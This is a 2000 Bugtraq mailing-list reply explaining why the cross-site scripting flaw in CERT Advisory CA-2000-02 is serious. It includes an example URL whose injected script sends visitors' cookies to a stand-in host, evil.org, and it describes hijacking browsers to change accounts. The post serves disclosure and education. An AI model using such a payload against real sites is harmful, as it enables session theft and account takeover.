[13711] in bugtraq
Re: Fwd: CERT Advisory CA-2000-02
daemon@ATHENA.MIT.EDU (Henri Torgemane)
Sat Feb 5 02:32:20 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3899FFAC.7A267096@yahoo.com>
Date: Thu, 3 Feb 2000 14:22:38 -0800
Reply-To: Henri Torgemane <metal_hurlant@YAHOO.COM>
From: Henri Torgemane <metal_hurlant@YAHOO.COM>
X-To: Shockro@aol.com
To: BUGTRAQ@SECURITYFOCUS.COM
First, what the CERT describes isn't one of the many implementation bugs we've
seen before, like bugs crashing the browser or giving access to local resources:
This is a design problem.
One obvious abuse could be to compromise online accounts:
Many sites use cookies to avoid asking for a username/password on every page of
their site. As a result, cookies are often equivalent to passwords.
Interestingly, javascript can access cookies on the domain from which the script
has been loaded.
Say, if your site uses cookies as a mean of authentication and has test-cgi
installed, you can get your user's cookies grabbed with a URL like:
http://yoursite.com/cgi-bin/test-cgi?a=<script>(new
Image).src="http://evil.org/?"+escape(document.cookie)</script>
Each time a user of your site happens to follow that URL, the log of the
evil.org web server will contain the cookies for his account.
In other cases, rather than actually taking the cookie, one can instead choose
to "remote-control" the browser, making it take actions to modify the user
account or grab some personal information (e-mail messages on a webmail system,
for example) without the user having a chance to see what's going on.
Hope it helps,
Henri Torgemane
Shockro@aol.com wrote:
> I'm curious as to how this could be used in a malicious manner, as opposed to
> just being an annoyance. I mean, god forbid, people should execute arbitrary
> javascript on us. Yes, we've all seen the file upload form exploit and the
> 1001 ways to crash Internet Explorer through infinite loops, but there's
> nothing seriously harmful about this, am I right? Please correct me if I'm
> wrong.
>
> Shockro
> Support DeCSS
> Support Reverse Engineering
